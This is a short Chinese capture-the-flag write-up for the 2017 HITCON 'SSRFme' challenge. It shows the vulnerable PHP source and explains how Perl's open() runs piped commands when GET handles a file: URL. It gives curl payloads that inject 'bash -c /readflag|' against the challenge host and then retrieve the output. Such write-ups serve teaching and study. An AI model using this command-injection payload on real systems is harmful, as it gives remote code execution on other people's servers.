2017_HITCON-CTF-SSRFme

題目源碼:

<?php 
 $sandbox = "sandbox/" . md5("orange" .$_SERVER["REMOTE_ADDR"]); 
 @mkdir($sandbox); 
 @chdir($sandbox); 
 $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
 $info = pathinfo($_GET["filename"]); 
 $dir  = str_replace(".", "", basename($info["dirname"])); 
 @mkdir($dir); 
 @chdir($dir); 
 @file_put_contents(basename($info["basename"]), $data); 
 highlight_file(__FILE__);


perl在open當(dāng)中可以執(zhí)行命令,如:

open(FD, "ls|")或open(FD, "|ls")

都可以執(zhí)行l(wèi)s命令,而GET是在perl下執(zhí)行的,當(dāng)GET使用file協(xié)議的時候就會調(diào)用到perl的open函數(shù),這就是我們要利用的點,


image.png

payload

curl -s 'http://13.115.136.15/?url=file:bash%20-c%20/readflag|&filename=/xx' > /dev/null
curl 'http://13.115.136.15/sandbox/f0a42db72ab289fd33e24107424a2f9a/xx/'
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,506評論 19 139
  • 為何叫做 shell ? shell prompt(PS1) 與 Carriage Return(CR) 的關(guān)系?...
    Zero___閱讀 3,312評論 3 49
  • Android 自定義View的各種姿勢1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 178,741評論 25 709
  • Ubuntu的發(fā)音 Ubuntu,源于非洲祖魯人和科薩人的語言,發(fā)作 oo-boon-too 的音。了解發(fā)音是有意...
    螢火蟲de夢閱讀 100,585評論 9 468
  • 好久沒怎么體會詩那無盡的幽香與美了。誠然如盆弟所言,在對詩的定義的探索里,古人和我們都是無解的。但我們或許知道些詩...
    管錐一見閱讀 696評論 5 13

友情鏈接更多精彩內(nèi)容